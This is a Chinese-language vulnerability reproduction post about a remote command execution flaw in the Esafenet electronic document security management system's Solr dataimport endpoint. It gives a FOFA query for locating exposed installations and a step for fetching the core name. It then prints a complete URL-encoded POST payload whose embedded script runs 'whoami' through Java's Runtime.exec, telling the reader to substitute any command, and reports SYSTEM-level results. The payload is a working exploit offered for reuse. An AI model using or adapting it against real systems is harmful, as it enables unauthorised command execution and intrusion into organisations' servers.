亿赛通_电子文档安全管理系统远程命令执行漏洞

# 亿赛通 电子文档安全管理系统远程命令执行漏洞

## 漏洞描述

亿赛通 电子文档安全管理系统 dataimport 存在远程命令执行漏洞,攻击者通过构造特定的请求可执行任意命令

## 漏洞影响

> 亿赛通电子文档安全管理系统

## FOFA

> title=”电子文档安全管理系统”

## 漏洞复现

登录界面如下:

![1](/static/qingy/亿赛通_电子文档安全管理系统远程命令执行漏洞/img/1.png)

首先我们需要访问以下URL来获取一个name的值:

“`
/solr/admin/cores
“`

![2](/static/qingy/亿赛通_电子文档安全管理系统远程命令执行漏洞/img/2.png)

然后我们需要打开三剑客之一的BURP

使用POST请求,请求以下URL:

“`
/solr/flow/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=%0A%3CdataConfig%3E%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22TRACE%22%20%2F%3E%0A%0A%20%20%3Cscript%3E%3C!%5BCDATA%5B%0A%20%20%20%20%20%20%20%20%20%20function%20poc(row)%7B%0A%20var%20bufReader%20%3D%20new%20java.io.BufferedReader(new%20java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(%22whoami%22).getInputStream()))%3B%0A%0Avar%20result%20%3D%20%5B%5D%3B%0A%0Awhile(true)%20%7B%0Avar%20oneline%20%3D%20bufReader.readLine()%3B%0Aresult.push(%20oneline%20)%3B%0Aif(!oneline)%20break%3B%0A%7D%0A%0Arow.put(%22title%22%2Cresult.join(%22%5Cn%5Cr%22))%3B%0Areturn%20row%3B%0A%0A%7D%0A%0A%5D%5D%3E%3C%2Fscript%3E%0A%0A%3Cdocument%3E%0A%20%20%20%20%3Centity%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0A%20%20%20%20%20%20%20%20name%3D%22entity1%22%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0A%20%20%20%20%20%20%20%20forEach%3D%22%2FRDF%2Fitem%22%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Apoc%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cfield%20column%3D%22title%22%20xpath%3D%22%2FRDF%2Fitem%2Ftitle%22%20%2F%3E%0A%20%20%20%20%3C%2Fentity%3E%0A%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E%0A%20%20%20%20%0A%20%20%20%20%20%20%20%20%20%20%20
“`

其中开头的/sorl/**/dataimport之中的*为刚刚的name值。

仔细查看后面的代码,我这里填写的whoami,在那里替换成其他命令即可。

然后再填写POST一个xml文件流,为:

“`




“`

我这里只为测试,执行whoami命令

![3](/static/qingy/亿赛通_电子文档安全管理系统远程命令执行漏洞/img/3.png)

可以看到返回了系统权限,NT也就是windows系统。

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容